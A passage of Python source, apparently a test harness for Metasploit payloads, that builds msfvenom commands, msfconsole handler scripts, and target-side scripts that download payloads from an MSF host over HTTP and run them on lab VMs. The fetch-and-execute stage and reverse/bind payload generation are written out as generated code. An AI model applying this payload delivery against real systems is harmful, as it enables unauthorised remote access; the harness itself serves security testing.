target['VM_OBJECT'] = vm
testVms.append(vm)
logMsg(logFile, "ASSIGNED VM: " + str(vm))
if 'PASSWORD' in target:
vm.setPassword(target['PASSWORD'])
if 'USERNAME' in target:
vm.setUsername(target['USERNAME'])
if not vmFound:
logMsg(logFile, "DID NOT FIND VM: " + target['NAME'] + " ON " + vm.server.hostname)
testVms.append(None)
return testVms
def launchStageThree(testConfig):
"""
Write each MSF host's STAGE_THREE_SCRIPT (bind-payload handlers) to a
local file named after the host's IP, then upload and run it on that
host.  Returns False on the first write or upload failure, True when all
hosts launched.
"""
for msfHost in testConfig['MSF_HOSTS']:
localScriptName = testConfig['SCRIPT_DIR'] + "/stageThree_" + '-'.join(msfHost['IP_ADDRESS'].split('.')) + ".sh"
try:
fileObj = open(localScriptName, 'w')
fileObj.write(msfHost['STAGE_THREE_SCRIPT'])
fileObj.close()
except IOError as e:
logMsg(testConfig['LOG_FILE'], "[ERROR] FAILED TO OPEN FILE " + localScriptName + '\n' + str(e))
return False
remoteScriptName = msfHost['SCRIPT_PATH'] + "/stageThree.sh"
# Shell script: no explicit interpreter needed on the guest.
remoteInterpreter = None
if not msfHost['VM_OBJECT'].uploadAndRun(localScriptName, remoteScriptName, remoteInterpreter):
logMsg(testConfig['LOG_FILE'], "[FATAL ERROR]: FAILED TO UPLOAD/EXECUTE " + localScriptName + " ON " + msfHost['VM_OBJECT'].vmName)
return False
return True
def launchStageTwo(testConfig, terminationToken, schedDelay = 180):
"""
Generate, upload, and launch each target's stage-two script (the script
that downloads and runs its payloads).  Windows targets get a Python
script run by the target's PYTHON interpreter; others get a shell
script.  Windows "schedule" targets are scheduled schedDelay seconds out
and the function sleeps past that delay before returning.
Returns (True, stageTwoNeeded, stageThreeNeeded) on success.
NOTE(review): the write-failure path returns the bare `(False)` -- that
is just False, not a 3-tuple; callers that unpack three values would
raise.  Also stageTwo/ThreeNeeded are overwritten per target, so the
returned flags reflect only the LAST target -- confirm both.
"""
stageTwoNeeded = False
stageThreeNeeded = False
addScheduleDelay = False
for target in testConfig['TARGETS']:
logMsg(testConfig['LOG_FILE'], "PROCESSING " + target['NAME'])
stageTwoNeeded, stageThreeNeeded = checkStagesNeeded(target)
# NOTE(review): this inner loop recomputes what checkStagesNeeded just
# returned; harmless duplication.
for sessionData in target['SESSION_DATASETS']:
if 'PAYLOAD' in sessionData:
stageTwoNeeded = True
if 'bind' in sessionData['PAYLOAD']['NAME']:
stageThreeNeeded = True
if stageTwoNeeded:
if 'VM_TOOLS_UPLOAD' in target['METHOD'].upper():
remoteInterpreter = None
# e.g. 10.0.0.5 -> 10x0x0x5, used to make per-target filenames.
escapedIp = 'x'.join(target['IP_ADDRESS'].split('.'))
logMsg(testConfig['LOG_FILE'], "I THINK " + target['NAME'] + " HAS IP ADDRESS " + target['IP_ADDRESS'])
if 'win' in target['NAME'].lower():
target['REMOTE_LOG'] = target['PAYLOAD_DIRECTORY'] + "\\stageTwoLog.txt"
target['STAGE_TWO_FILENAME'] = "stageTwoScript_" + escapedIp + ".py"
remoteScriptName = target['PAYLOAD_DIRECTORY'] + "\\" + target['STAGE_TWO_FILENAME']
remoteInterpreter = target['PYTHON']
target['STAGE_TWO_SCRIPT'] = target['STAGE_TWO_SCRIPT'] + \
makeStageTwoPyScript(target, testConfig['HTTP_PORT'], target['REMOTE_LOG'], terminationToken)
else:
target['REMOTE_LOG'] = target['PAYLOAD_DIRECTORY'] + "/stageTwoLog.txt"
target['STAGE_TWO_FILENAME'] = "stageTwoScript_" + escapedIp + ".sh"
remoteScriptName = target['PAYLOAD_DIRECTORY'] + "/" + target['STAGE_TWO_FILENAME']
remoteInterpreter = None
target['STAGE_TWO_SCRIPT'] = target['STAGE_TWO_SCRIPT'] + \
makeStageTwoShScript(target, testConfig['HTTP_PORT'], target['REMOTE_LOG'], terminationToken)
localScriptName = testConfig['SCRIPT_DIR'] + "/" + target['STAGE_TWO_FILENAME']
try:
fileObj = open(localScriptName, 'w')
fileObj.write(target['STAGE_TWO_SCRIPT'])
fileObj.close()
except IOError as e:
logMsg(testConfig['LOG_FILE'], "[ERROR] FAILED TO WRITE TO FILE " + localScriptName + str(e))
return (False)
logMsg(testConfig['LOG_FILE'], "METHOD= " + target['METHOD'])
if ('win' in target['NAME'].lower()) and ('schedule' in target['METHOD'].lower()):
addScheduleDelay = True
launchResult = target['VM_OBJECT'].uploadAndSchedule(localScriptName, remoteScriptName, schedDelay, remoteInterpreter)
else:
launchResult = target['VM_OBJECT'].uploadAndRun(localScriptName, remoteScriptName, remoteInterpreter)
if launchResult:
logMsg(testConfig['LOG_FILE'], "[INFO]: SUCCESSFULLY LAUNCHED " + localScriptName + " ON " + target['VM_OBJECT'].vmName)
else:
logMsg(testConfig['LOG_FILE'], "[FATAL ERROR]: FAILED TO UPLOAD/EXECUTE " + localScriptName + " ON " + target['VM_OBJECT'].vmName)
else:
logMsg(testConfig['LOG_FILE'], "NO STAGE TWO REQUIRED FOR " + target['NAME'])
if addScheduleDelay:
# IF WE SCHEDULED THE JOBS, ADD THE DELAY IN BEFORE WE BOTHER CHECKING ON THE PROGRESS
realSleepTime = schedDelay + 60
logMsg(testConfig['LOG_FILE'], "[INFO]: SLEEPING FOR " + str(realSleepTime) + " TO ALLOW SCHEDULED TASKS TO START")
time.sleep(realSleepTime)
else:
logMsg(testConfig['LOG_FILE'], "NO STAGE TWO WAIT REQUIRED")
return (True, stageTwoNeeded, stageThreeNeeded)
def loadJson(fileName, logFile = "default.log"):
    """Read fileName and return the parsed JSON object, or None on any
    read/parse failure (the failure is logged).

    Bug fixed: logMsg takes (logFile, message) but both error paths called
    it with only the message, raising TypeError instead of logging; logFile
    is now a defaulted parameter so existing one-argument callers still
    work.
    """
    retDict = None
    try:
        fileObj = open(fileName, 'r')
        jsonStr = fileObj.read()
        fileObj.close()
    except IOError as e:
        logMsg(logFile, "FAILED TO FIND JSON FILE " + fileName + "\n" + str(e))
        return retDict
    try:
        retDict = json.loads(jsonStr)
    except ValueError as f:
        logMsg(logFile, "FAILED TO PARSE JSON FILE " + fileName + "\n" + str(f))
    return retDict
def logMsg(logFile, strMsg):
    """Append one timestamped line to logFile.

    A None message is recorded as "[None]".  Returns True on success, False
    when the log file cannot be opened for append.
    """
    if strMsg == None:
        strMsg = "[None]"
    line = 'testlog:[' + str(datetime.now()) + '] ' + strMsg + '\n'
    try:
        with open(logFile, 'a') as out:
            out.write(line)
    except IOError:
        return False
    return True
def logTargetData(testConfig):
    """Debug helper: log each target's module[:payload] session matrix to the
    configured log file.  Always returns None."""
    log = testConfig['LOG_FILE']
    divider = "================================================================================"
    for target in testConfig['TARGETS']:
        logMsg(log, divider)
        logMsg(log, "SESSION_DATASETS FOR " + target['NAME'])
        logMsg(log, divider)
        for sessionData in target['SESSION_DATASETS']:
            if 'PAYLOAD' in sessionData:
                logMsg(log, sessionData['MODULE']['NAME'] + ":" + sessionData['PAYLOAD']['NAME'])
            else:
                logMsg(log, sessionData['MODULE']['NAME'])
    return None
def makeHtmlReport(targetData, msfHosts):
"""
Render run results as one HTML page: a table of MSF hosts
(name/IP/commit/pcap link) followed by one row per module+payload session
with a green PASSED / red FAILED cell and a link to the session log.
Returns the HTML string.
"""
htmlString = "<html>\n<head>\n<title>\n\tTEST RESULTS\n</title>\n</head>\n\n<body>\n"
htmlString = htmlString + "<table border=\"1\">\n<tr><td>MSF_HOST NAME</td><td>MSF_HOST IP</td><td>MSF COMMIT VERSION</td><td>PCAP</td></tr>\n"
for msfHost in msfHosts:
pcapLink = "<a href=" + msfHost['LOCAL_PCAP'] + ">PCAP FILE</a>"
htmlString = htmlString + "<tr><td>" + msfHost['NAME'] + "</td><td>" + msfHost['IP_ADDRESS'] + "</td><td>" + msfHost['COMMIT_VERSION'] + "</td><td>" + pcapLink + "</td></tr>\n"
htmlString = htmlString + "</table>\n"
htmlString = htmlString + "<table border=\"1\">\n<tr><td>TARGET</td><td>TYPE</td><td>MSF_HOST</td><td>MODULE</td><td>PAYLOAD</td><td>STATUS</td><td>SESSION</td></tr>\n"
passedString = "<td bgcolor = \"#00cc00\">PASSED</td>"
failedString = "<td bgcolor = \"#cc0000\">FAILED</td>"
for host in targetData:
for sessionData in host['SESSION_DATASETS']:
payloadFileName = "NO PAYLOAD FILE"
payloadName = "NO PAYLOAD (AUX?)"
interpreter = ""
if 'PAYLOAD' in sessionData:
payloadName = sessionData['PAYLOAD']['NAME'].lower()
if 'FILENAME' in sessionData['PAYLOAD']:
payloadFileName = sessionData['PAYLOAD']['FILENAME']
# Show which interpreter served the staged payload, if any.
if 'java' in payloadName:
interpreter = "<br>" + host['METERPRETER_JAVA']
if 'python' in payloadName:
interpreter = "<br>" + host['METERPRETER_PYTHON']
htmlString = htmlString + "<tr><td>" + host['NAME'] + "<br>" + host['IP_ADDRESS'] + "</td>" + \
"<td>" + host['TYPE'] + "</td>" + \
"<td>" + sessionData['MSF_HOST']['NAME'] + "<br>" + sessionData['MSF_HOST']['IP_ADDRESS'] + "</td>" + \
"<td>" + sessionData['MODULE']['NAME'] + "</td>" + \
"<td>" + payloadName + "<br>" + payloadFileName + interpreter + "</td>"
if 'STATUS' in sessionData:
if sessionData['STATUS']:
htmlString = htmlString + passedString + "\n"
else:
htmlString = htmlString + failedString + "\n"
else:
# checkData skipped this session (e.g. unreadable local log).
htmlString = htmlString + "<td> NO STATUS LISTED?</td>\n"
htmlString = htmlString + "<td><a href=" + sessionData['LOCAL_SESSION_FILE'] + ">SESSION CONTENT</a></td></tr>\n"
htmlString = htmlString + "</table>\n</body>\n</html>\n"
return htmlString
def makeVenomCmd(targetData, sessionData, portNum, logFile):
    """Build the msfvenom command line that generates this session's payload
    file, choosing the output extension/format from the payload platform and
    pointing bind payloads at the target / reverse payloads at the MSF host.
    Also records the final filename back into payloadData['FILENAME'].

    Bug fixed: each SETTINGS entry was passed through replaceWildcards but
    the ORIGINAL (unexpanded) string was appended to the command; the
    expanded string is now used, matching makeRcScript's handling.
    """
    payloadData = sessionData['PAYLOAD']
    payloadType = payloadData['NAME']
    payloadFileName = payloadData['FILENAME']
    msfHostData = sessionData['MSF_HOST']
    """
    WHAT FILE EXTENSION SHOULD WE USE?
    """
    execFormat = ''
    if 'windows' in payloadData['NAME'].lower():
        payloadFileName = payloadFileName + ".exe"
        execFormat = ' -f exe '
    elif 'linux' in payloadData['NAME'].lower():
        payloadFileName = payloadFileName + ".elf"
        execFormat = ' -f elf '
    elif 'python' in payloadData['NAME'].lower():
        payloadFileName = payloadFileName + ".py"
    elif 'java' in payloadData['NAME'].lower():
        payloadFileName = payloadFileName + ".jar"
    else:
        logMsg(logFile, "UNKNOWN PAYLOAD TYPE: " + payloadData['NAME'].lower())
    payloadData['FILENAME'] = payloadFileName
    logMsg(logFile, "PAYLOAD FILENAME = " + payloadData['FILENAME'])
    msfVenomCmd = "./msfvenom -p " + payloadData['NAME'] + execFormat + " -o " + payloadData['FILENAME']
    # ADD HOST DATA: bind payloads listen on the target, reverse payloads
    # call back to the MSF host.
    if 'bind' in payloadType.lower():
        msfVenomCmd = msfVenomCmd + " RHOST=" + targetData['IP_ADDRESS'] + " LPORT=" + str(payloadData['PRIMARY_PORT'])
    else:
        msfVenomCmd = msfVenomCmd + " LHOST=" + msfHostData['IP_ADDRESS'] + " LPORT=" + str(payloadData['PRIMARY_PORT'])
    for settingEntry in payloadData['SETTINGS']:
        processedString = replaceWildcards(settingEntry, targetData, sessionData, portNum)
        # Append the wildcard-expanded value (was settingEntry, which
        # silently discarded the expansion).
        msfVenomCmd = msfVenomCmd + " " + processedString
    logMsg(logFile, "msfvenom cmd = " + msfVenomCmd)
    return msfVenomCmd
def makeRcScript(cmdList, targetData, sessionData, logFile, portNum):
"""
Build a shell snippet that, when run on the MSF host, writes a msfconsole
.rc resource script (sessionData['RC_IN_SCRIPT_NAME']) via a series of
echo redirections.  The generated .rc selects the module, sets
RHOST(S)/payload options, runs it in the background, waits for a session,
appends the extra commands from cmdList (wildcards expanded), and exits.
Returns the snippet text.
NOTE(review): logFile and portNum feed replaceWildcards only; this
function itself does not log.
"""
if 'PAYLOAD' in sessionData:
payloadName = sessionData['PAYLOAD']['NAME']
else:
payloadName = "NONE"
# Header comment lines baked into the generated .rc for traceability.
rcScriptContent = "# HANDLER SCRIPT FOR \n" + \
"# MODULE: " + sessionData['MODULE']['NAME'] + "\n" + \
"# PAYLOAD: " + payloadName + "\n" + \
"# TARGET: " + targetData['NAME'] + ' [' + targetData['IP_ADDRESS'] +"]\n" + \
"# MSF HOST: " + sessionData['MSF_HOST']['IP_ADDRESS'] + "\n"
rcScriptName = sessionData['RC_IN_SCRIPT_NAME']
# Reusable 2-second ruby sleep block, inserted between console commands.
rubySleep = "echo '<ruby>' >> " + rcScriptName + '\n'
rubySleep = rubySleep + "echo ' sleep(2)' >> " + rcScriptName + '\n'
rubySleep = rubySleep + "echo '</ruby>' >> " + rcScriptName + '\n'
rcScriptContent = rcScriptContent + "echo 'use " + sessionData['MODULE']['NAME'] + " ' > " + rcScriptName + "\n"
if sessionData['MODULE']['NAME'] != 'exploit/multi/handler':
# THIS IS TERRIBLE, AND I WISH WE DID NOT HAVE TO DO THIS MAYBE ONLY FOR AUX LATER?
rcScriptContent = rcScriptContent + "echo 'set RHOST " + targetData['IP_ADDRESS'] + " ' >> " + rcScriptName + "\n"
rcScriptContent = rcScriptContent + "echo 'set RHOSTS " + targetData['IP_ADDRESS'] + " ' >> " + rcScriptName + "\n"
# Module SETTINGS arrive as "KEY=VALUE" strings, wildcard-expanded first.
for settingItem in sessionData['MODULE']['SETTINGS']:
processedString = replaceWildcards(settingItem, targetData, sessionData, portNum)
if '=' in processedString:
rcScriptContent = rcScriptContent + "echo 'set " + processedString.split('=')[0] + ' ' + processedString.split('=')[1] + "' >> " + rcScriptName + '\n'
if 'PAYLOAD' in sessionData:
rcScriptContent = rcScriptContent + "echo 'set payload " + sessionData['PAYLOAD']['NAME'] +"' >> " + rcScriptName + '\n'
for settingItem in sessionData['PAYLOAD']['SETTINGS']:
rcScriptContent = rcScriptContent + "echo 'set " + settingItem.split('=')[0] + ' ' + settingItem.split('=')[1] + "' >> " + rcScriptName + '\n'
# bind: handler connects out to target; reverse: handler listens locally.
if 'bind' in sessionData['PAYLOAD']['NAME']:
rcScriptContent = rcScriptContent + "echo 'set RHOST " + targetData['IP_ADDRESS'] + "' >> " + rcScriptName + '\n'
rcScriptContent = rcScriptContent + "echo 'set LPORT " + str(sessionData['PAYLOAD']['PRIMARY_PORT']) + "' >> " + rcScriptName + '\n'
if 'reverse' in sessionData['PAYLOAD']['NAME']:
rcScriptContent = rcScriptContent + "echo 'set LHOST " + sessionData['MSF_HOST']['IP_ADDRESS'] + "' >> " + rcScriptName + '\n'
rcScriptContent = rcScriptContent + "echo 'set LPORT " + str(sessionData['PAYLOAD']['PRIMARY_PORT']) + "' >> " + rcScriptName + '\n'
rcScriptContent = rcScriptContent + "echo 'show options' >> " + rcScriptName + '\n'
rcScriptContent = rcScriptContent + rubySleep
if sessionData['MODULE']['NAME'] != 'exploit/multi/handler':
rcScriptContent = rcScriptContent + "echo 'check' >> " + rcScriptName + '\n'
rcScriptContent = rcScriptContent + "echo 'run -z' >> " + rcScriptName + '\n'
# Block until at least one session exists, then settle for 30 s.
rcScriptContent = rcScriptContent + "echo '<ruby>' >> " + rcScriptName + '\n'
rcScriptContent = rcScriptContent + "echo ' while framework.sessions.count == 0 do '>> " + rcScriptName + '\n'
rcScriptContent = rcScriptContent + "echo ' sleep(1)' >> " + rcScriptName + '\n'
rcScriptContent = rcScriptContent + "echo ' end' >> " + rcScriptName + '\n'
rcScriptContent = rcScriptContent + "echo ' sleep(30)' >> " + rcScriptName + '\n'
rcScriptContent = rcScriptContent + "echo '</ruby>' >> " + rcScriptName + '\n'
else:
rcScriptContent = rcScriptContent + "echo 'show options' >> " + rcScriptName + '\n'
rcScriptContent = rcScriptContent + rubySleep
rcScriptContent = rcScriptContent + "echo 'run -z' >> " + rcScriptName + '\n'
rcScriptContent = rcScriptContent + "echo '<ruby>' >> " + rcScriptName + '\n'
rcScriptContent = rcScriptContent + "echo ' sleep(10)' >> " + rcScriptName + '\n'
rcScriptContent = rcScriptContent + "echo '</ruby>' >> " + rcScriptName + '\n'
# Append caller-supplied commands; suppress the extra sleep inside any
# literal <ruby>...</ruby> block the caller embeds.
addSleep = True
for cmd in cmdList:
processedCmd = replaceWildcards(cmd, targetData, sessionData, portNum)
rcScriptContent = rcScriptContent + "echo '" + processedCmd + "' >> " + rcScriptName + '\n'
if "<ruby>" in processedCmd.lower():
addSleep = False
if "</ruby>" in processedCmd.lower():
addSleep = True
if addSleep:
rcScriptContent = rcScriptContent + rubySleep
rcScriptContent = rcScriptContent + "echo 'exit -y' >> " + rcScriptName + '\n'
return rcScriptContent
def makeStageTwoPyScript(targetData, httpPort, remoteLogFile, terminationToken):
    """
    Build the stage-two script -- returned as a string of Python source --
    that runs on a target host with a Python interpreter.

    The generated script downloads each exploit/multi/handler payload from
    the MSF host's HTTP server, launches it, dumps 'netstat -ant' output to
    the remote log, and finally writes terminationToken to remoteLogFile so
    the controller can detect completion.

    NOTE(review): the emitted code uses the Python 2 print statement and
    urllib.urlretrieve, so the TARGET interpreter must be Python 2 --
    confirm before pointing this at Python-3-only hosts.

    targetData       -- target host dict (PAYLOAD_DIRECTORY, SESSION_DATASETS,
                        METERPRETER_PYTHON / METERPRETER_JAVA paths, ...)
    httpPort         -- port of the payload HTTP server on the MSF host
    remoteLogFile    -- path on the target where progress is logged
    terminationToken -- sentinel string marking end-of-script in the log
    """
    stageTwoPyContent = "# AUTOGENERATED TEST SCRIPT \n"
    stageTwoPyContent = stageTwoPyContent + "import subprocess\n"
    stageTwoPyContent = stageTwoPyContent + "import time\n"
    stageTwoPyContent = stageTwoPyContent + "import urllib\n"
    stageTwoPyContent = stageTwoPyContent + "\n"
    # Emit helper: append a message to the remote log file (best effort).
    stageTwoPyContent = stageTwoPyContent + "def logError(logFile, logMessage):\n"
    stageTwoPyContent = stageTwoPyContent + "    try:\n"
    stageTwoPyContent = stageTwoPyContent + "        fileObj = open(logFile, 'a')\n"
    stageTwoPyContent = stageTwoPyContent + "        fileObj.write(logMessage)\n"
    stageTwoPyContent = stageTwoPyContent + "        fileObj.close()\n"
    stageTwoPyContent = stageTwoPyContent + "    except Exception as e:\n"
    stageTwoPyContent = stageTwoPyContent + "        print 'logError Failed: ' + str(e) + '\\n'\n"
    stageTwoPyContent = stageTwoPyContent + "        return False\n"
    stageTwoPyContent = stageTwoPyContent + "    return True\n"
    stageTwoPyContent = stageTwoPyContent + "\n"
    # Emit helper: download a payload, retrying up to 10 times.
    # NOTE(review): the emitted getPayload always returns True even if all
    # 10 attempts fail (downloadSuccess is set but never updated/checked) --
    # confirm that callers treat the return value as best-effort only.
    stageTwoPyContent = stageTwoPyContent + "def getPayload(url, localName, logFile):\n"
    stageTwoPyContent = stageTwoPyContent + "    downloadSuccess = False\n"
    stageTwoPyContent = stageTwoPyContent + "    for i in range(10):\n"
    stageTwoPyContent = stageTwoPyContent + "        logError(logFile, 'DOWNLOADING ' + url + '\\n')\n"
    stageTwoPyContent = stageTwoPyContent + "        try:\n"
    stageTwoPyContent = stageTwoPyContent + "            urllib.urlretrieve(url, localName)\n"
    stageTwoPyContent = stageTwoPyContent + "        except Exception as e:\n"
    stageTwoPyContent = stageTwoPyContent + "            logError(logFile, 'FAILED TO GET ' + url + ':\\n' + str(e) + '\\n')\n"
    stageTwoPyContent = stageTwoPyContent + "            time.sleep(5)\n"
    stageTwoPyContent = stageTwoPyContent + "            continue\n"
    stageTwoPyContent = stageTwoPyContent + "        logError(logFile, 'DOWNLOADED ' + url + '\\n')\n"
    stageTwoPyContent = stageTwoPyContent + "        break\n"
    stageTwoPyContent = stageTwoPyContent + "    return True\n"
    stageTwoPyContent = stageTwoPyContent + "\n"
    # Emit helper: launch a subprocess, optionally returning its output.
    stageTwoPyContent = stageTwoPyContent + "def runCommand(cmdList, getOutput, logFile):\n"
    stageTwoPyContent = stageTwoPyContent + "    logError(logFile, 'LAUNCHING ' + ' '.join(cmdList) + '\\n')\n"
    stageTwoPyContent = stageTwoPyContent + "    try:\n"
    stageTwoPyContent = stageTwoPyContent + "        payloadProcess = subprocess.Popen(cmdList, stdout = subprocess.PIPE, stderr = subprocess.PIPE)\n"
    stageTwoPyContent = stageTwoPyContent + "    except Exception as e:\n"
    stageTwoPyContent = stageTwoPyContent + "        logError(logFile, 'FAILED TO RUN ' + ' '.join(cmdList) + ':\\n' + str(e) +'\\n')\n"
    stageTwoPyContent = stageTwoPyContent + "        return False\n"
    stageTwoPyContent = stageTwoPyContent + "    logError(logFile, 'LAUNCHED ' + ' '.join(cmdList) + '\\n')\n"
    stageTwoPyContent = stageTwoPyContent + "    time.sleep(5)\n"
    stageTwoPyContent = stageTwoPyContent + "    if getOutput:\n"
    stageTwoPyContent = stageTwoPyContent + "        return payloadProcess.communicate()\n"
    stageTwoPyContent = stageTwoPyContent + "    return True\n"
    stageTwoPyContent = stageTwoPyContent + "logError(r'" + remoteLogFile + "', 'TESTING\\n')\n"
    stageTwoPyContent = stageTwoPyContent + "\n"
    # One download+launch stanza per multi/handler payload assigned to this target.
    for sessionData in targetData['SESSION_DATASETS']:
        if 'PAYLOAD' in sessionData and sessionData['MODULE']['NAME'].lower() == "exploit/multi/handler":
            msfIpAddress = sessionData['MSF_HOST']['IP_ADDRESS']
            payloadFile = sessionData['PAYLOAD']['FILENAME']
            stageTwoPyContent = stageTwoPyContent + "url = 'http://" + msfIpAddress + ":" + str(httpPort) + "/" + payloadFile + "'\n"
            stageTwoPyContent = stageTwoPyContent + "fileName = r'" + targetData['PAYLOAD_DIRECTORY'] + '\\' + payloadFile + "'\n"
            # Pick the launcher based on payload type; raw executables run directly.
            if '.py' in payloadFile:
                stageTwoPyContent = stageTwoPyContent + "cmdList = [r'" + targetData['METERPRETER_PYTHON'] +"', fileName]\n"
            elif 'jar' in payloadFile:
                stageTwoPyContent = stageTwoPyContent + "cmdList = [r'" + targetData['METERPRETER_JAVA'] + "','-jar', fileName]\n"
            else:
                stageTwoPyContent = stageTwoPyContent + "cmdList = [fileName]\n"
            stageTwoPyContent = stageTwoPyContent + "getPayload(url, fileName, r'" + remoteLogFile + "')\n"
            stageTwoPyContent = stageTwoPyContent + "runCommand(cmdList, False, r'" + remoteLogFile + "')\n"
            stageTwoPyContent = stageTwoPyContent + "time.sleep(5)\n"
    # Capture listening-socket state for the report, then emit the sentinel.
    stageTwoPyContent = stageTwoPyContent + "cmdList = ['netstat', '-ant']\n"
    stageTwoPyContent = stageTwoPyContent + "netstatResults = runCommand(cmdList, True, r'" + remoteLogFile + "')\n"
    stageTwoPyContent = stageTwoPyContent + "logError(r'" + remoteLogFile + "', str(netstatResults[0]))\n"
    stageTwoPyContent = stageTwoPyContent + "logError(r'" + remoteLogFile + "', str(netstatResults[1]))\n"
    stageTwoPyContent = stageTwoPyContent + "logError(r'" + remoteLogFile + "','" + terminationToken + "\\n')\n"
    return stageTwoPyContent
def makeStageTwoShScript(targetData, httpPort, remoteLogFile, terminationToken):
    """
    Build the stage-two shell script that runs on a unix-style target.

    The generated script downloads each exploit/multi/handler payload from
    the MSF host's HTTP server, marks it executable, launches it in the
    background, and finally writes terminationToken to remoteLogFile so
    the controller can detect completion.  Returns the script text.
    """
    parts = ["# AUTOGENERATED TEST SCRIPT \n",
             "cd " + targetData['PAYLOAD_DIRECTORY'] + " \n"]
    for sessionData in targetData['SESSION_DATASETS']:
        # Only payloads delivered via exploit/multi/handler need a manual launch.
        if 'PAYLOAD' not in sessionData or sessionData['MODULE']['NAME'].lower() != "exploit/multi/handler":
            continue
        serverIp = sessionData['MSF_HOST']['IP_ADDRESS']
        payloadFile = sessionData['PAYLOAD']['FILENAME']
        downloadUrl = "'http://" + serverIp + ":" + str(httpPort) + "/" + payloadFile + "'\n"
        parts.append("\nwget " + downloadUrl + "\n")
        parts.append("sleep 5 \n")
        parts.append("chmod 755 " + payloadFile + "\n")
        # Pick the interpreter from the payload type; raw binaries run directly.
        if '.py' in payloadFile:
            parts.append(targetData['METERPRETER_PYTHON'] + " " + payloadFile + "&\n")
        elif 'jar' in payloadFile:
            parts.append(targetData['METERPRETER_JAVA'] + " -jar " + payloadFile + "&\n")
        else:
            parts.append("./" + payloadFile + "&\n")
    parts.append("echo " + terminationToken + " > " + remoteLogFile + "\n")
    return ''.join(parts)
def parseHypervisorConfig(hypervisorConfigFile):
    """
    Read and parse a hypervisor configuration JSON file.

    hypervisorConfigFile -- path to the JSON config file
    Returns the parsed data (normally a dict), or None if the file cannot
    be read or does not contain valid JSON (a message is printed either way).
    """
    try:
        # 'with' guarantees the handle is closed even if read() raises,
        # unlike the manual open/read/close it replaces.
        with open(hypervisorConfigFile, 'r') as fileObj:
            jsonString = fileObj.read()
    except IOError:
        print("FAILED TO FIND HYPERVISOR CONFIG FILE: " + hypervisorConfigFile)
        return None
    try:
        hypervisorData = json.loads(jsonString)
    except Exception as e:
        print("FAILED TO PARSE HYPERVISOR CONFIG FILE: " + str(e))
        return None
    return hypervisorData
def parseTestConfig(configFile):
    """
    Read and parse the main test-configuration JSON file.

    configFile -- path to the JSON test configuration
    Returns the parsed dict, or None on read/parse failure (a message is
    printed in either failure case).
    """
    try:
        # BUG FIX: the original called 'fileObj.close' without parentheses,
        # so the handle was never closed; a context manager closes it reliably.
        with open(configFile, 'r') as fileObj:
            jsonString = fileObj.read()
    except IOError as e:
        print("FAILED TO OPEN: " + configFile + '\n' + str(e))
        return None
    try:
        jsonDic = json.loads(jsonString)
    except Exception as e:
        print("FAILED TO PARSE DATA FROM: " + configFile + '\n' + str(e))
        return None
    return jsonDic
def prepConfig(args):
    """
    Build the full test-run configuration dictionary from parsed CLI args.

    Loads the JSON file named by args.testfile, overlays command-line
    overrides (framework branch, an extra payload and/or module), derives
    the report/session/script directory paths (creating them on disk),
    and records the log-file path.

    args -- argparse-style namespace with testfile, framework, payload,
            payloadoptions and module attributes.
    Returns the populated config dict, or None if credential loading
    fails; exits the process (status 999) if the JSON file is unusable.
    """
    logFile = None  # no log path exists yet; pass None to logMsg for early failures
    configData = parseTestConfig(args.testfile)
    if None == configData:
        logMsg(logFile, "THERE WAS A PROBLEM WITH THE TEST JSON CONFIG FILE")
        exit(999)
    if args.framework != None:
        configData['FRAMEWORK_BRANCH'] = args.framework
    if args.payload != None:
        # A CLI-supplied payload is appended to (or seeds) the PAYLOADS list.
        payloadDic = {}
        payloadDic['NAME'] = args.payload
        if args.payloadoptions != None:
            payloadDic['SETTINGS'] = args.payloadoptions.split(',')
        else:
            payloadDic['SETTINGS'] = []
        if 'PAYLOADS' in configData:
            configData['PAYLOADS'].append(payloadDic.copy())
        else:
            configData['PAYLOADS'] = [payloadDic.copy()]
    # Default to the generic handler when no module was given anywhere.
    if (args.module == None) and ('MODULES' not in configData):
        args.module = "exploit/multi/handler"
    if args.module != None:
        moduleDic = {}
        moduleDic['NAME'] = args.module
        moduleDic['SETTINGS'] = []
        if 'MODULES' in configData:
            configData['MODULES'].append(moduleDic.copy())
        else:
            configData['MODULES'] = [moduleDic.copy()]
    """
    SET UP DIRECTORY NAMES IN THE CONFIG DICTIONARY
    """
    if 'FRAMEWORK_BRANCH' not in configData:
        configData['FRAMEWORK_BRANCH'] = 'upstream/master'
    # Report prefix: test-file base name, plus the payload type when one was given.
    configData['REPORT_PREFIX'] = os.path.splitext(os.path.basename(args.testfile))[0]
    if args.payload != None:
        payloadType = args.payload.split('/')[-1]
        configData['REPORT_PREFIX'] = configData['REPORT_PREFIX'] + "-" + payloadType
    # Whole-second epoch timestamp; also used to name temp VM snapshots later.
    configData['TIMESTAMP'] = str(time.time()).split('.')[0]
    configData['DATA_DIR'] = os.getcwd() + "/" + "test_data"
    configData['TEST_DIR'] = configData['DATA_DIR'] + "/" + configData['REPORT_PREFIX'] + "_" + configData['TIMESTAMP']
    configData['REPORT_DIR'] = configData['TEST_DIR'] + "/" + "reports"
    configData['SESSION_DIR'] = configData['TEST_DIR'] + "/" + "sessions"
    configData['SCRIPT_DIR'] = configData['TEST_DIR'] + "/" + "scripts"
    if not os.path.exists(configData['DATA_DIR']):
        os.makedirs(configData['DATA_DIR'])
    if not os.path.exists(configData['TEST_DIR']):
        os.makedirs(configData['TEST_DIR'])
    if not os.path.exists(configData['REPORT_DIR']):
        os.makedirs(configData['REPORT_DIR'])
    if not os.path.exists(configData['SESSION_DIR']):
        os.makedirs(configData['SESSION_DIR'])
    if not os.path.exists(configData['SCRIPT_DIR']):
        os.makedirs(configData['SCRIPT_DIR'])
    """
    ADD LOGFILE TO THE configData DICTIONARY
    """
    configData['LOG_FILE'] = configData['REPORT_DIR'] + "/testlog.log"
    if 'TARGET_GLOBALS' in configData:
        expandGlobalAttributes(configData)
    if 'CREDS_FILE' in configData:
        if getCreds(configData) == False:
            return None
    return configData
def prepStagedScripts(testConfig, portNum):
    """
    THIS SECTION MARSHALLS THE DATA WE WILL NEED LATER TO GENERATE THE THREE STAGED SCRIPTS
    TO MAKE THE STAGE ONE SCRIPT, CREATE THE MSFVENOM COMMANDS AND RC SCRIPTS, THEN SPLIT
    THEM BETWEEN THE MSF_HOSTS
    FOR EACH PAYLOAD TO AN UPLOAD TARGET:
    PREP STAGE ONE SCRIPT:
    (1) GENERATE THE MSFVENOM COMMAND TO EXECUTE ON THE MSF_HOST TO MAKE THE PAYLOAD
    (2) ADD THE MSFVENOM COMMAND TO THE STAGE ONE SCRIPT
    (3) GENERATE AN RC SCRIPT TO RUN ON THE MSFHOST TO SET UP THE PAYLOAD HANDLER
